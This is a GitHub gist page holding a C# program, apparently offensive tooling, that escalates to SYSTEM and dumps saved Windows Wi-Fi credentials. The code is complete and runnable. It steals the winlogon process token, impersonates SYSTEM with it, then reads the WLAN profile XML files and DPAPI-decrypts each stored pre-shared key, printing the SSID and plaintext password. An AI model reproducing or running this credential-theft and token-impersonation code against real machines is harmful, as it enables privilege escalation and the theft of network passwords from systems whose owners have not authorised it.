-
-
Save S3cur3Th1sSh1t/ca315ccd46ae4b28c0abb4b450cbeedb to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Globalization; | |
using System.Security.Cryptography; | |
using System.Xml; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
using System.Diagnostics; | |
namespace GetWifiCredentials | |
{ | |
class DumpThemAll | |
{ | |
[DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)] | |
public static extern bool OpenProcessToken(IntPtr ProcessHandle, int DesiredAccess, out IntPtr TokenHandle); | |
[DllImport("advapi32", SetLastError = true)] | |
public static extern bool DuplicateToken(IntPtr ExistingTokenHandle, int SECURITY_IMPERSONATION_LEVEL, ref IntPtr DuplicateTokenHandle); | |
[DllImport("advapi32", SetLastError = true)] | |
public static extern bool ImpersonateLoggedOnUser(IntPtr hToken); | |
[DllImport("kernel32", SetLastError = true)] | |
public static extern bool CloseHandle(IntPtr hObject); | |
String[] interfaces; | |
internal DumpThemAll() | |
{ | |
interfaces = Directory.GetDirectories(@"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\"); | |
} | |
internal void GetThem() | |
{ | |
Console.WriteLine("{0,-20} {1,-63}", "SSID", "PSK"); | |
Console.WriteLine("{0,-20} {1,-63}", "----", "---"); | |
XmlDocument doc = new XmlDocument(); | |
foreach (String inter in interfaces) | |
{ | |
String[] files = Directory.GetFiles(inter); | |
foreach (String file in files) | |
{ | |
doc.Load(file); | |
XmlNodeList name = doc.GetElementsByTagName("name"); | |
XmlNodeList keys = doc.GetElementsByTagName("keyMaterial"); | |
foreach (XmlNode key in keys) | |
{ | |
try | |
{ | |
Console.WriteLine("{0,-20} {1,-63}", name[0].InnerText, DPAPIDecrypt(key.InnerText)); | |
} | |
catch | |
{ | |
Console.WriteLine("{0,-20} {1,-63}", name[0].InnerText, "No PSK found"); | |
} | |
} | |
} | |
} | |
} | |
internal static String DPAPIDecrypt(String input) | |
{ | |
Char[] array = input.ToCharArray(); | |
Int32 hold; | |
System.Text.StringBuilder test = new System.Text.StringBuilder(); | |
Byte[] inputBytes = new Byte[array.Length / 2]; | |
Int32 j = 0; | |
for (Int32 i = 0; i < array.Length; i += 2) | |
{ | |
String chars = String.Format("{0}{1}", array[i], array[i + 1]); | |
if (Int32.TryParse(chars, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out hold)) | |
{ | |
inputBytes[j] = Convert.ToByte((char)hold); | |
j++; | |
} | |
} | |
Byte[] outputBytes = ProtectedData.Unprotect(inputBytes, null, DataProtectionScope.LocalMachine); | |
return System.Text.Encoding.ASCII.GetString(outputBytes); | |
} | |
static void Main(string[] args) | |
{ | |
GetSystem(); | |
Console.WriteLine("[+] Successfully impersonated SYSTEM user\r\n\r\n"); | |
DumpThemAll gwp = new DumpThemAll(); | |
gwp.GetThem(); | |
} | |
public static bool IsHighIntegrity() | |
{ | |
WindowsIdentity identity = WindowsIdentity.GetCurrent(); | |
WindowsPrincipal principal = new WindowsPrincipal(identity); | |
return principal.IsInRole(WindowsBuiltInRole.Administrator); | |
} | |
public static void GetSystem() | |
{ | |
if (IsHighIntegrity()) | |
{ | |
IntPtr hToken = IntPtr.Zero; | |
Process[] processes = Process.GetProcessesByName("winlogon"); | |
IntPtr handle = processes[0].Handle; | |
bool success = OpenProcessToken(handle, 0x0002, out hToken); | |
IntPtr hDupToken = IntPtr.Zero; | |
success = DuplicateToken(hToken, 2, ref hDupToken); | |
success = ImpersonateLoggedOnUser(hDupToken); | |
CloseHandle(hToken); | |
CloseHandle(hDupToken); | |
} | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment